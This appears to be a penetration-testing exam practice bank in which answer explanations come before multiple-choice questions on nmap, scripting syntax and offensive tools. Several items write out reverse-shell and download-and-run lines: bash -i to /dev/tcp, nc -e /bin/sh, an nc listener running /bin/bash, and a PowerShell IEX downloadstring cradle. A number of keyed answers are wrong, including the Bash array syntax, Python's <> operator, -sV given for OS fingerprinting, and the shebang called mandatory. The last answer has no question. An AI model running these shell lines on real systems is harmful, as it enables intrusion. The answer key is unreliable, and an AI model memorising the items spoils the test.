
A or B. Either the ncat or netcat remote access tool could be used to set up a bind shell exploit.

During a gray box penetration test, the tester wants to be able to set up a bind shell exploit where a listener is set up on a compromised system on the target. Which remote access tools could be used to do this? A. ncat B. netcat C. Powersploit D. DAST E. SAST

C. An if/then flow control structure in Bash uses the following syntax: - if condition then - commands... - else - commands... - fi

Consider the following snippet from a script: if test -f $FileName; then echo "The file exists." else echo "The file does not exist." fi What scripting language is this snippet written in? A. Ruby B. PowerShell C. Bash D. Python

B. The declare -i TOTAL command will create the TOTAL variable and type it as integer.

Which Bash script command will create a new variable named TOTAL and set its type to be integer? A. variable -i TOTAL B. declare -i TOTAL C. declare TOTAL -t integer D. TOTAL=integer

C. The test command can be used from within an if/then flow control structure to evaluate whether a specified condition is true.

Which command can be used from within an if/then flow control structure in a Bash script to evaluate whether a specified condition is true? A. eval B. == C. test D. <>

A. Adding the echo $TargetHost line to a PowerShell script causes it to display the value of a variable named TargetHost on the screen.

Which command in a PowerShell script will cause it to write the value of a variable named TargetHost on the screen? A. echo $TargetHost B. print (TargetHost) C. writeln TargetHost D. puts TargetHost

B. Adding the print (TargetHost) line to a Python script causes it to display the value of a variable named TargetHost on the screen.

Which command in a Python script will cause it to write the value of a variable named TargetHost on the screen? A. echo $TargetHost B. print (TargetHost) C. writeln TargetHost D. puts TargetHost

D. Adding the puts TargetHost line to a Ruby script causes it to display the value of a variable named TargetHost on the screen.

Which command in a Ruby script will cause it to write the value of a variable named TargetHost on the screen? A. echo $TargetHost B. print (TargetHost) C. writeln TargetHost D. puts TargetHost

D. All of the options shown in this question will cause nmap to detect services running on the target host. However, only the -sV option can be used with nmap to detect the version number of those services.

Which command option causes nmap to detect services running on a target host and report the version number of any services found? A. -sS B. -sT C. -sU D. -sV

C. The -p U:20,T:21,22 command tells nmap to just scan UDP port 20 and TCP ports 21 and 22. The other options in this question will also scan these ports; however, they also scan many other unwanted ports.

Which command option will cause nmap to scan just UDP port 20 and TCP ports 21 and 22? A. -p 20-22 B. --top-ports 1024 C. -p U:20,T:21,22 D. -p-

D. The if/then/else structure is considered to be a flow control structure because it branches the script in one of several directions based on how a specified condition evaluates.

Which control structure is considered to be a flow control structure? A. while loop B. for loop C. until loop D. if/then/else

C. The until looping structure will keep processing over and over as long as the specified condition evaluates to false.

Which control structure will keep processing over and over as long as the specified condition evaluates to false? A. while loop B. for loop C. until loop D. if/then/else

A. A while loop will keep processing over and over until the specified condition evaluates to false.

Which control structure will keep processing over and over until a specified condition evaluates to false? A. while loop B. for loop C. until loop D. if/then/else E. case

B. The for looping structure will process a specified number of times.

Which control structure will process a specified number of times? A. while loop B. for loop C. until loop D. if/then/else E. case

B. APK Studio is a tool that you can use to reverse engineer an APK executable and analyze it for vulnerabilities.

Which mobile tool can be used to reverse engineer an APK file from a mobile device running the Android operating system? A. Peach B. APK Studio C. Drozer D. DAST

A. Android APK Decompilation for the Lazy (APKX) is a Python wrapper that can extract Java source code directly from an Android APK executable.

Which mobile tool is a Python wrapper that can extract Java source code directly from an Android APK executable? A. APKX B. AFL C. Drozer D. DAST

C. The Drozer utility provides a complete security auditing and attack framework designed exclusively for mobile devices running the Android operating system.

Which mobile tool provides an attack framework that can be used to exploit mobile devices running the Android operating system? A. APKX B. APK Studio C. Drozer D. DAST

A. The --proxies option causes nmap to relay connections through a proxy server. You need to include the IP address of one or more proxy servers with this option.

Which nmap option causes the utility to relay connections through a proxy server? A. --proxies B. -S C. -D D. -g

A. nmap is the most commonly used command-line vulnerability scanner and is a free, open source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. nmap is a port scanner. To scan for ports, you will want to use -p <port ranges> (only scan specified ports). This option specifies which ports you want to scan and overrides the default scan. Individual port numbers or ranges are acceptable. Ranges are separated by a hyphen (e.g., 1-1023). The beginning and/or end values of a range may be omitted, causing nmap to use 1 and 65535, respectively. So, you can specify -p- to scan ports from 1 through 65535. Port scanning a system simply requires that nmap be installed and that you provide the target system's hostname or IP address.

Which nmap switch must a penetration tester use if they want to scan all the TCP ports on an identified device? A. -p- 1-65535 B. -p ALX C. -p 1-65544 D. -port 1-65534

A. The -T5 option causes nmap to scan in insane mode. This is the fastest type of nmap scan. However, the speed also makes it easier to detect by IDS/IPS tools or the target's IT staff.

Which nmap timing option causes it to scan in Insane mode? A. -T5 B. -T4 C. -T3 D. -T2 E. -T1

A. The -T0 option causes nmap to scan in paranoid mode, in which only one port is scanned on a target host every five minutes. While this mode can be used to run the stealthiest scans, it also causes them to run incredibly slowly.

Which nmap timing option causes it to scan in Paranoid mode? A. -T0 B. -T1 C. -T2 D. -T3 E. -T4

C. The -T2 option causes nmap to scan in polite mode. This type of scan runs quite slowly. However, the slowness also makes the scan harder to detect.

Which nmap timing option causes it to scan in Polite mode? A. -T0 B. -T1 C. -T2 D. -T3 E. -T4

D and E. Both Medusa and Hydra utilities can be used to conduct brute-force password attacks.

Which of the following are commonly used to perform brute-force password attacks? (Choose two.) A. BeEF B. Drozer C. W3AF D. Medusa E. Hydra

B and D. Both Patator and Aircrack-ng utilities can be used to conduct brute-force password attacks. Patator can be used to compromise a variety of network services, such as FTP, SNMP, and SSH servers. Aircrack-ng is used to brute-force wireless networks.

Which of the following can be used to perform brute-force password attacks? (Choose two.) A. Empire B. Patator C. Powersploit D. Aircrack-ng E. APK Studio

B. The #!/bin/bash element must be included at the beginning of every Bash shell script.

Which of the following elements must be included at the beginning of every Bash script? A. #Comment B. #!/bin/bash C. exit 0 D. #begin script

D. The Dirbuster utility is a brute-force utility that can be used by penetration testers to discover directories and files on a web server or an application server, including hidden files or directories.

Which of the following is a brute-force utility that can be used by penetration testers to discover directories and files on a web server? A. ncat B. Powersploit C. FOCA D. Dirbuster

C and D. Both Empire and PowerSploit utilities are based on Windows PowerShell. Essentially, they are a collection of PowerShell scripts that can be used to conduct a variety of exploits.

Which of the following penetration tools are based on Windows PowerShell? (Choose two.) A. BeEF B. SET C. Empire D. PowerSploit E. Hopper

C and E. Both foremost and FTK are forensic tools. They are used to gather and analyze digital evidence from a cyber crime scene.

Which of the following tools are used to collect and analyze evidence from a digital crime scene? (Choose two.) A. APKX B. Peach C. foremost D. AFL E. FTK

A and B. Both Findsecbugs and Yet Another Source Code Analyzer (YASCA) can be used to perform static application security testing (SAST) or dynamic application security testing (DAST) as part of software assurance.

Which of the following tools can be used as a part of software assurance processes to perform SAST and DAST testing? (Choose two.) A. Findsecbugs B. YASCA C. Metasploit D. theHarvester E. Recon-ng

A and D. Both AFL and Peach can be used to perform fuzzing on an application as part of software assurance.

Which of the following tools can be used as a part of software assurance processes to perform fuzz testing on an application? (Choose two.) A. AFL B. OllyDbg C. Immunity debugger D. Peach E. GDB

A. Although Nikto is usually considered a vulnerability scanner used by penetration testers, it can also be used by system administrators to verify configuration compliance within their networks, specifically with the configuration of their web servers.

Which of the following tools can be used by a system administrator to ensure the network is in configuration compliance? A. Nikto B. Tableau C. AFL D. IDA Pro

A and D. Both APK Studio and APKX can be used to debug or even decompile an Android executable.

Which of the following tools can be used to debug or decompile an Android executable? (Choose two.) A. APK Studio B. OllyDbg C. Immunity debugger D. APKX E. GDB

A and C. Both Nikto and W3AF utilities are commonly used to scan targets for vulnerabilities.

Which of the following utilities can be categorized as vulnerability scanners? (Choose two.) A. Nikto B. SET C. W3AF D. Medusa E. Hydra

C. The -oA option causes nmap to write the output from the scan to a normal text file, in an XML-formatted text file, and in a greppable text file all at once. You must specify a base filename with this option. A different extension will be added to each of the files generated using this base filename. The normal file will have an .nmap extension, the greppable file will have a .gnmap extension, and the XML file will have an .xml extension.

Which option causes nmap to save its output in a normal text file, in an XML-formatted text file, and in a greppable text file all at once? A. -oX B. -oN C. -oA D. -oG

B. The -oN option causes nmap to write the output from the scan to a standard text file. You must specify a filename with this option.

Which option causes nmap to save its output to a standard text file in the file system of the host where it was run? A. -oX B. -oN C. -oT D. -oV

D. The -oG option causes nmap to write the output from the scan to a text file in a format that allows it to be quickly searched using the grep command. You must specify a filename with this option.

Which option causes nmap to save its output to a text file that can be quickly searched using the grep command? A. -oV B. -oN C. -oT D. -oG

A. The -oX option causes nmap to write the output from the scan to an XML-formatted text file. You must specify a filename with this option.

Which option causes nmap to save its output to an XML-formatted text file in the file system of the host where it was run? A. -oX B. -oN C. -oT D. -oG

C. The -F option causes nmap to scan a specified host for the 100 most commonly used IP ports. For example, this scan would include ports 20, 21, 23, 25, 53, 80, and so on. Sometimes, this is called a fast port scan.

Which option causes nmap to scan a host for the 100 most commonly used IP ports, such as 20, 21, 23, 25, 53, 80, etc.? A. -p- B. -sV C. -F D. -p 100

D. The -iR option causes nmap to scan a specified number of random hosts. For example, if you wanted to scan 50 random hosts, you would use the -iR 50 option with the nmap command.

Which option causes nmap to scan a specified number of random hosts? A. -iL B. -sS C. -sR D. -iR

A. The -f option causes nmap to scan using tiny, fragmented packets. Sometimes these small packets can be more difficult for packet filtering firewalls to properly analyze.

Which option causes nmap to scan using tiny, fragmented packets in an attempt to fool a packet filtering firewall? A. -f B. -Pn C. -n D. -sC

B. The -D option causes nmap to send scans from a spoofed IP address. You can specify one or more fake source IP addresses using this option.

Which option causes nmap to send scans from a spoofed IP address? A. -f B. -D C. -n D. -sF

C. The impacket penetration testing tool consists of a collection of Python classes used for low-level access to network protocols, such as SMB and MSRPC protocols.

Which penetration testing tool consists of a collection of Python classes used for low-level access to network protocols, such as SMB? A. Searchsploit B. Empire C. Impacket D. Responder

D. The searchsploit utility is a command-line search tool that is used to query the online Exploit-DB database for known exploits.

Which penetration testing tool is a command-line search tool for the online Exploit-DB database of known exploits? A. findbugs B. Shodan C. Censys D. Searchsploit

A. The Metasploit Framework (MSF) penetration testing tool provides a huge number of exploits that can be used to compromise the target organization's network.

Which penetration testing tool provides penetration testers with a huge number of exploits that can be used to compromise the target organization's network? A. Metasploit Framework B. SET C. hping D. ncat

A. The Browser Exploitation Framework (BeEF) is a penetration testing utility designed to exploit weaknesses in web browsers using client-side attacks.

Which penetration testing utility is focused on exploiting web browsers? A. BeEF B. foremost C. FTK D. EnCase E. Tableau

C. The -ge relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than or equal to the other.

Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than or equal to the other? A. >= B. -gt C. -ge D. !>=

B. The -gt relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than the other.

Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than the other? A. >= B. -gt C. -ge D. !>=

C. The -le relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than or equal to the other.

Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than or equal to the other? A. <= B. -lt C. -le D. !<

B. The -lt relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than the other.

Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than the other? A. <= B. -lt C. -le D. !<

A. The >= relational operator can be used in both Python and Ruby to test whether one value is numerically greater than or equal to the other.

Which relational operator can be used in both Python and Ruby to test whether one value is numerically greater than or equal to the other? A. >= B. -gt C. -ge D. !>=

A. The > relational operator can be used in both Python and Ruby to test whether one value is numerically greater than the other.

Which relational operator can be used in both Python and Ruby to test whether one value is numerically greater than the other? A. > B. < C. -gt D. !>

A. The <= relational operator can be used in both Python and Ruby to test whether one value is numerically less than or equal to the other.

Which relational operator can be used in both Python and Ruby to test whether one value is numerically less than or equal to the other? A. <= B. -lt C. -le D. !<

D. The < relational operator can be used in both Python and Ruby to test whether one value is numerically less than the other.

Which relational operator can be used in both Python and Ruby to test whether one value is numerically less than the other? A. <= B. -lt C. -le D. <

D. The ncat utility is an updated and improved version of the older netcat utility.

Which remote access tool was created by the organization that developed nmap as an updated version of the netcat utility that supports encrypted data tunnels? A. Metasploit Framework B. SET C. hping D. ncat

B. The Social Engineer Toolkit (SET) is an open source penetration testing utility designed to conduct social engineering exploits.

Which utility is used to conduct social engineering exploits? A. Responder B. SET C. APKX D. Immunity debugger E. Hopper

B. The CeWL utility can be configured to crawl the target organization's website and gather keywords from the site that could possibly be used as passwords by employees and then save them in a list. The list can then be used to run a brute-force password attack.

While performing a black box penetration test, the tester wants to crawl the target organization's website and gather key words that may possibly be used as passwords by employees and save them in a list. The tester will then run a brute-force password utility using that list in an attempt to gain access. Which utility should be used to create the possible password file? A. hashcat B. CeWL C. netcat D. Hydra

A and C. When declaring a variable, PowerShell uses a syntax of $variable_name = value. Ruby uses the same syntax when declaring a global variable.

While reading an executable script file, you see a line near the beginning of the script that declares a variable using the following syntax: $ServerName = FS1 Which type of script could this be? (Choose two.) A. PowerShell B. Bash C. Ruby D. Python

B and D. When declaring a variable, both Bash and Python use the same syntax: variable_name = value.

While reading an executable script file, you see a line near the beginning of the script that declares a variable using the following syntax: ServerName = FS1 Which type of script could this be? (Choose two.) A. PowerShell B. Bash C. Ruby D. Python

C. When declaring a local variable, Ruby uses a syntax of _variable_name = value.

While reading an executable script file, you see a line near the beginning of the script that declares a variable using the following syntax: _ServerName = FS1 Which type of script could this be? A. PowerShell B. Bash C. Ruby D. Python

A. When declaring an array, PowerShell uses the following syntax: $array_name = @(value1, value2, value3, ...).

While reading an executable script file, you see a line near the beginning of the script that declares an array using the following syntax: $PrimeNumArray = @(2, 3, 5, 7, 11) Which type of script could this be? A. PowerShell B. Bash C. Ruby D. Python

B. When declaring an array, Bash uses the following syntax: array_name = (value1, value2, value3, ...).

While reading an executable script file, you see a line near the beginning of the script that declares an array using the following syntax: PrimeNumArray = (2, 3, 5, 7, 11) Which type of script could this be? A. PowerShell B. Bash C. Ruby D. Python


D and F. In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22, and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks.

A penetration tester has successfully exploited a DMZ server that seems to be listening to an outbound port. The tester wants to forward that traffic back to a device. What are the best tools to do this? (Choose two.) A. Cain and Abel B. Netcat C. Nmap D. Secure Shell (SSH) E. Tcpdump F. Wireshark

B and C. Given this scenario, the word let does not need to be included in the script, so it can be removed, and in Bash, the equivalent to an = is -eq, which is the arithmetic binary operator. Once these modifications are made, the script will work as expected.

A penetration tester is analyzing a script to determine why the script is not returning the correct results as expected. The expected results should be True. root:~# cat ./myscript.sh #!/bin/bash source=10 let dest=5+5 if [ 'source' = 'dest' ]; then echo "True" else echo "False" fi #End of File root:~# ./myscript.sh False By reviewing the script, how would the tester correct the errors to return the correct results? (Choose two.) A. Change 'fi' to 'EndIf' B. Remove let in front of dest=5+5 C. Change the = to -eq D. Change 'source' and 'dest' to "$source" and "$dest" E. Change 'else' to 'elif'

D. Passive reconnaissance is also known as open source intelligence (OSINT). The idea behind passive reconnaissance is to gather information about a target using only publicly available resources. Shodan is a specialized search engine that provides discovery of specific types of computers and devices that are connected to the Internet by using a variety of filters. Peach is a fuzzing tool, OpenVAS performs network vulnerability scans, and CeWL is a custom wordlist generator that searches websites for keywords that may be used in password-guessing attacks.

A penetration tester wants to perform passive reconnaissance on the client's external domain. What would be the best choice to use? A. CeWL B. OpenVAS C. Peach D. Shodan

A. A reverse shell opens a communication channel on a port and waits for incoming connections. The client's machine acts as a server and initiates a connection to the tester's machine. This is what is done by using the following: - bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1 Given the options, A is the best option. B and C will not work because they are using the <SOURCEIP> and not the <DESTINATIONIP>. Option D is not correct because it is using the improper syntax.

A penetration tester is conducting a test and gains access into an unrestricted system network by using port 443. The tester wants to create a reverse shell from the client back to the tester. Which of the following methods is most likely what the tester will use? A. bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1 B. nc -e /bin/sh <SOURCEIP> 443 C. perl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443; D. ssh superadmin@<DESTINATIONIP> -p 443

A. Netcat can be used to set up a Telnet server in a matter of seconds. You can specify the shell you want Netcat to run at a successful connection with the -e parameter. In this scenario, the proper syntax would be nc -lp 444 -e /bin/bash. The nc - tells Windows to run the nc.exe file with the following arguments: -l: Listen mode, for inbound connections -p: Specifies a port to listen for a connection on -e: Tells what program to run once the port is connected to (cmd.exe) -v: Specifies to be verbose, printing out messages on Standard Error, such as when a connection occurs

A penetration tester is conducting a test and has compromised the client's host. What is the correct syntax to create a Netcat listener on this device? A. nc -lp 4444 -e /bin/bash B. nc -lvp 4444 /bin/bash C. nc -p 4444 /bin/bash D. nc -vp 4444 /bin/bash

B. SQLmap can be used to brute-force crack the password for an SQL database.

A penetration tester is performing a gray box test for a client. The tester decides to run a brute-force attack against a SQL database. Which utility could be used to do this? A. John the Ripper B. SQLmap C. WiFite D. Nikto

A. Mimikatz can be used to compromise Kerberos-based authentication systems, including generating "golden" and "silver" Kerberos tickets.

A penetration tester is performing a gray box test for a client. The tester wants to try to generate a Kerberos "golden ticket" to compromise services within the target Active Directory domain. Which utility could be used to do this? A. Mimikatz B. John the Ripper C. W3AF D. ncat

D. Metasploit is a tool for the development of exploits and the testing of them on live targets. The socks4a auxiliary is a module from within the framework. This auxiliary module provides a proxy server that uses Metasploit Framework routing to relay connections. So, using the use auxiliary/server/socks4a module allows a tester to access a private network from the Internet.

A penetration tester is using Metasploit. What command would allow the tester to access a private network from the Internet? A. db_nmp -iL /tmp/privatentwk.txt B. run autoroute -a 192.168.1.10/24 C. set rhost 192.168.1.10 D. use auxiliary/server/socks4a

A. In this scenario, the PowerShell command given will execute a remote script. By using the PowerShell IEX command, it will invoke an expression. The IEX cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. The PowerShell Invoke-Command cmdlet runs commands on a local or remote computer and returns all output from the commands, including errors. By using a single Invoke-Command command, you can run commands on multiple computers.

A penetration tester is using PowerShell to conduct testing. The tester is using the following PowerShell command: powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1");Invoke-Command What action is being performed by this command? A. It executes a remote script. B. It incorporates an object. C. It runs an encoded command. D. It sets the execution policy.

D. The -T4 option tells nmap to scan in aggressive mode. This type of scan runs quite quickly. However, the speed also makes the scan easier to detect by IDS/IPS systems or the target's IT staff.

A penetration tester is using nmap to scan hosts on the target network. The client has a lax security posture and employs a relatively inexperienced IT staff. Which timing option could she consider using with nmap to speed up her scans? A. -T1 B. -T2 C. -T3 D. -T4

A. The -T1 option tells nmap to scan in sneaky mode. In this mode, a port will be scanned once every 15 seconds. As such, this type of scan is very slow. However, the slowness also makes the scan harder to detect.

A penetration tester is using nmap to scan hosts on the target network. The client uses an aggressive IPS tool and employs an experienced IT staff that she needs to avoid. Which timing option should she use with nmap to avoid detection? (Assume that time is not an issue.) A. -T1 B. -T3 C. -T4 D. -T5

C. If the nmap command is run without specifying a timing option, then the -T3 option is used by default. This tells nmap to scan in normal mode.

A penetration tester runs an nmap scan without specifying a timing option. Which one is used by default? A. -T1 B. -T2 C. -T3 D. -T4 E. -T0

A. The -sS option causes nmap to run a TCP SYN scan. In this scan, nmap sends a TCP SYN packet to a target host, and then the target host responds with a SYN ACK packet. However, instead of finishing the connection, nmap sends a reset packet to the target host.

A penetration tester uses the nmap utility to send a TCP SYN packet to a target host. The target host responds with a SYN ACK packet, but instead of finishing the connection, nmap sends a reset packet to the target host. Which option did the tester use with the nmap command? A. -sS B. -sT C. -sU D. -sL

C and E. Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts. Shodan is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources.

A penetration tester wants to conduct open-source intelligence (OSINT) data collection from publicly available sources. Which of the following tools can be used? (Choose two.) A. BeEF B. Dynamo C. Maltego D. SET E. Shodan F. Wireshark

B. In a credentials brute-force attack, the tester will try to log in to the application using every username and password. Hydra is a brute-forcing tool that can crack systems using password guessing.

A penetration tester wants to perform a credential brute-force attack on a client's application. Which of the following tools should be used? A. Hashcat B. Hydra C. John the Ripper D. Peach

A. The -Pn option tells nmap to scan a host (or an entire subnet) without actually discovering hosts. This type of scan should be avoided during a penetration test because it takes a long time; each port on each IP address in the range is scanned, regardless of whether the IP address is valid. Because of this, it also creates a tremendous amount of traffic that may be detected by an IDS or IPS tool.

A penetration tester wants to run a port scan on all hosts on the 192.168.1.0 subnet (with a subnet mask of 255.255.255.0) without actually discovering the hosts first. Which command should she use? A. nmap 192.168.1.0/24 -Pn B. nmap 192.168.1.0/24 -sL C. nmap 192.168.1.0/24 -sn D. nmap 192.168.1.0/24 -n

D. Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses. It can target individual systems or entire local networks, allowing you to analyze or respond to NetBIOS name services pretending to be the system that the query is intended for.

A penetration tester wants to target the NetBIOS name service. Which command is most likely to be used to exploit the NetBIOS name service? A. arpspoof B. burpsuite C. nmap D. responder

C. Metasploit is launched by running msfconsole from the command line. The msfconsole command is located in the /usr/share/metasploit-framework/msfconsole directory.

A penetration tester wants to use Metasploit. Which of the following commands will start the Metasploit database? A. db_connect B. db_init C. msfconsole D. msfvenom

A and F. One of nmap's best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines the responses. -iL <inputfilename>: This is the input from list of hosts/networks. -sV: This probes open ports to determine service/version info.

A penetration tester, using nmap, has been asked to conduct OS fingerprinting using a company-provided text file that contains a list of all the IP addresses. What switches would you need to include in your code to conduct OS fingerprinting using the text file? (Choose two.) A. -iL B. -O C. -oN D. -oX E. -sS F. -sV

C. Hydra is designed to include support for NTLM hashes as a password. Hashcat is a password cracking and recovery tool. Drozer is a framework for Android security assessments. Kismet is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. Hydra, often known as thc-hydra, is a brute-force dictionary attack tool that is designed to work against a variety of protocols and services.

A tester has captured NTLM hashes and wants to conduct a pass-the-hash attack. Unfortunately, the tester doesn't know which systems on the network may accept the hash. What tool should the tester use to conduct the test? A. Drozer B. Hashcat C. Hydra D. Kismet

A. The tester will want to create a Netcat listener that waits for the inbound shell from the target machine. To get a shell, Netcat uses nc -nvlp 443 to listen for incoming connections. Using this syntax, the tester is telling Netcat (nc) not to resolve names (-n), to be verbose, printing a message when a connection occurs (-v), and to listen (-l) on a given local port (-p).

A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0>&1 Which additional command would need to be executed on the tester's Linux system to make the previous command work? A. nc -nvlp 443 B. nc 10.2.4.6 443 C. nc -w3 10.2.4.6 443 D. nc-/bin/ah 10.2.4.6 443

A. The Browser Exploitation Framework (BeEF) is designed for this type of attack. BeEF provides an automated toolkit for using social engineering to take over a client's web browser. The tester can then use various phishing and social engineering techniques to get employees to visit the site.

A penetration tester wants to deploy a malicious website as part of the test to exploit the browsers belonging to the client's employees. What tool can the tester utilize? A. Browser Exploitation Framework (BeEF) B. Metasploit C. Open Web Application Security Project (OWASP) D. Social Engineer Toolkit (SET)

D and E. OWASP ZAP as well as Nessus can be used to scan a target for vulnerabilities.

As a part of a penetration test, you need to perform an in-depth scan of a target to identify vulnerabilities, such as missing updates or misconfigured security settings. Which utilities could you use to do this? (Choose two.) A. Censys B. theHarvester C. Shodan D. OWASP ZAP E. Nessus

D. The ncat utility can be used to read, write, redirect, and encrypt network data. For example, it can be used to establish shell sessions with a variety of servers, including Windows, Linux, and UNIX systems.

As a part of a penetration test, you want to access a shell session on a target Windows server. Which utility could be used to do this? A. Ollydbg B. GDB C. WinDBG D. ncat

A and D. The whois and nslookup utilities can be used to passively conduct reconnaissance on the target organization. Because they report information that is available to the general public, using these tools is highly unlikely to arouse any suspicion.

As a part of a penetration test, you need to perform reconnaissance on the target organization to passively gather information. Which tools could you use to do this? (Choose two.) A. whois B. Metasploit Framework C. OpenVAS D. nslookup E. Nessus

D and E. You could use either Kismet or WiFite to try to break the target organization's wireless network. You could also use Aircrack-ng to accomplish this.

As a part of a black box penetration test, you've discovered that the target organization's wireless network signal is emanating out into the parking lot and across the street. You want to access the internal network using this wireless network radio signal. However, the wireless network is encrypted. Which wireless compromise tools could you use to do this? (Choose two.) A. searchsploit B. netcat C. OWASP ZAP D. WiFite E. Kismet

A. Adding the echo $TargetHost line to a Bash script causes it to display the value of a variable named TargetHost on the screen.

As a part of a gray box penetration test, you need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to display the value of a variable named TargetHost on the screen. Which command will do this? A. echo $TargetHost B. write TargetHost C. writeln TargetHost D. output $TargetHost

A. When creating an associative array in a Bash script, you use the following syntax: array_name[element_name] = value. In this example, the line Target[HostName] = FS1 assigns a value of FS1 to the element named HostName within the Target array.

As a part of a gray box penetration test, you need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this? A. Target[HostName] = FS1 B. Target = [{"HostName":"FS1"}] C. $Target.HostName = 'FS1' D. _Target = {"HostName" => "FS1"}

C. When making a comparison between two integer values in a Bash script to see whether one is greater than the other, you use the -gt relational operator.

As a part of a gray box penetration test, you need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two integer variables to test whether one is numerically greater than the other. Which relational operator should you use? A. > B. < C. -gt D. !>

C. When creating an associative array in a PowerShell script, you use the following syntax: $array_name.element_name = "value". In this example, the line $Target.HostName = 'FS1' assigns a value of FS1 to the element named HostName within the Target array.

As a part of a gray box penetration test, you need to create a PowerShell script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this? A. Target[HostName] = FS1 B. Target = [{"HostName":"FS1"}] C. $Target.HostName = 'FS1' D. _Target = {"HostName" => "FS1"}

C. When making a comparison between two values in a PowerShell script to see if they are equal, you use the -eq relational operator.

As a part of a gray box penetration test, you need to create a PowerShell script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables to test whether they are equal. Which relational operator should you use? A. = B. == C. -eq D. !=

B. When creating an associative array in a PowerShell script, you use the following syntax: array_name = [{"element_name:value"}]. In this example, the line Target = [{"HostName":"FS1"}] assigns a value of FS1 to the element named HostName within the Target array.

As a part of a gray box penetration test, you need to create a Python script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this? A. Target[HostName] = FS1 B. Target = [{"HostName":"FS1"}] C. $Target.HostName = 'FS1' D. _Target = {"HostName" => "FS1"}

A and D. When making a comparison between two values in a Python script to see whether they are not equal, you can use either the <> or the != relational operator.

As a part of a gray box penetration test, you need to create a Python script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables that tests whether they are not equal. Which relational operators could you use? (Choose two.) A. <> B. == C. -eq D. != E. -ne

B. When making a comparison between two values in a Python script to see whether they are equal, you use the == relational operator.

As a part of a gray box penetration test, you need to create a Python script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables to test whether they are equal. Which relational operator should you use? A. = B. == C. -eq D. !=

D. When creating an associative array in a Ruby script, you use the following syntax: _array_name = {"element_name => value"}. In this example, the line _Target = {"HostName" => "FS1"} assigns a value of FS1 to the element named HostName within the Target array.

As a part of a gray box penetration test, you need to create a Ruby script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this? A. Target[HostName] = FS1 B. Target = [{"HostName":"FS1"}] C. $Target.HostName = 'FS1' D. _Target = {"HostName" => "FS1"}

B. When making a comparison between two values in a Ruby script to see whether they are equal, you use the == relational operator.

As a part of a gray box penetration test, you need to create a Ruby script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables to test whether they are equal. Which relational operator should you use? A. = B. == C. -eq D. !=

B and C. The nmap and hping utilities can be used to actively enumerate and fingerprint target systems.

As a part of a penetration test, you need to establish an active connection to the computer systems and devices at the target organization to enumerate and fingerprint them. Which tools could you use to do this? (Choose two.) A. whois B. nmap C. hping D. Aircrack-ng E. John the Ripper

A and B. John the Ripper as well as Cain and Abel can be used to crack passwords from an offline database of user accounts, such as the shadow and passwd files from a Linux system.

As a part of a penetration test, you need to gather user account names and passwords from the passwd and shadow files from a Linux server. Which utilities could you use to do this? (Choose two.) A. John the Ripper B. Cain and Abel C. Kismet D. Censys E. Recon-ng

A and B. Both IDA and Hopper can be used for decompilation. During this process, an executable file is reverse-compiled into source code, allowing you to examine it for vulnerabilities.

As a part of a penetration test, you want to reverse compile the executable for an in-house developed application used by the target organization. Which of the following tools can be used to do this? (Choose two.) A. IDA B. Hopper C. route D. Tableau E. FTK

C. The hashcat utility can be configured to use GPUs instead of CPUs to perform password cracking operations. This can dramatically speed up the process as GPUs can perform this task much faster than standard CPUs can.

As a penetration tester, you want to improve your password cracking speed by building a specialized system with multiple video boards installed. Which tool can take advantage of multiple GPUs for password cracking? A. proxychains B. John the Ripper C. hashcat D. theHarvester

A and C. Either the -p http,https option or the -p 80,443 option can be used with nmap to scan a host for a web server service.

As a penetration tester, you want to scan a Linux server with an IP address of 192.168.1.200 in the target network and see whether it has a web server installed and running. Which nmap commands will do this? (Choose two.) A. nmap 192.168.1.200 -p http,https B. nmap 192.168.1.200 -sn 80,443 C. nmap 192.168.1.200 -p 80,443 D. nmap 192.168.1.200 -T4 80,443

B. The --top-ports 1000 option tells nmap to scan the default ports used by the 1,000 most popular network services. The --exclude-ports 53 option tells nmap to skip port 53 (the default port used by DNS servers) during the scan.

